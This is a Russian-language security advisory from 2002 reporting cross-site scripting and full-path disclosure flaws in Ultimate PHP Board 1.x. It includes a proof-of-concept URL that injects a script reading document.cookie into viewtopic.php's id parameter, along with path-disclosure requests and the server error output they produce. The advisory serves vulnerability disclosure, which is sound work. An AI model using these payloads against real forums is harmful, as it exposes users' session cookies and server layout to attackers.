Множественные уязвимости в Ultimate PHP Board

Дата публикации:
09.12.2002
Всего просмотров:
1733
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Раскрытие системных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Ultimate PHP Board (UPB) 1.x
Описание: Ultimate PHP Board – небольшой форум, написанный на PHP.

Непроверка данных, передаваемых переменной id в сценарии viewtopic.php, приводит к возможности увидеть полный путь к форуму от корня + дает возможность вставки произвольного html кода. Сценарий add.php также позволяет получить информацию о физическом расположении сценариев на сервере. Пример:

1. Запрос сценария add.php выдаст следующую ошибку:

Warning: Failed opening 'textdb_v2.inc.php' for inclusion 
(include_path='.:/usr/local/lib/php') in 
/home/samcom/public_html/public/messageboard2/add.php on line 5
attempting to edit record...
Fatal error: Call to undefined function: format_field() in 
/home/samcom/public_html/public/messageboard2/add.php on line 11
2. Следующий запрос позволяет вставить произвольный HTML код в сценарий viewtopic.php:
http://hostname.com/phorum/viewtopic.php?id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
3. Раскрытие пути в viewtopic.php:
http://hostname.com/phorum/viewtopic.php?id=some_shit&t_id=2
==============================================================

cos the `id' parameter doesnt check if input data has entered
correctly, then it output folloving error message: 

===================--======= snip =============================
Warning: Unable to access ./data_dir/some_shit.dat in 
/home/samcom/public_html/public/messageboard2/textdb.inc.php on 
line 240
уязвимость обнаружена в Ultimate PHP Board (UPB) final beta 1.0

Уязвимость обнаружил euronymous из HACKRU Team (f0kp.iplus.ru)

Ссылки: XSS and Path Disclosure in UPB

или введите имя

CAPTCHA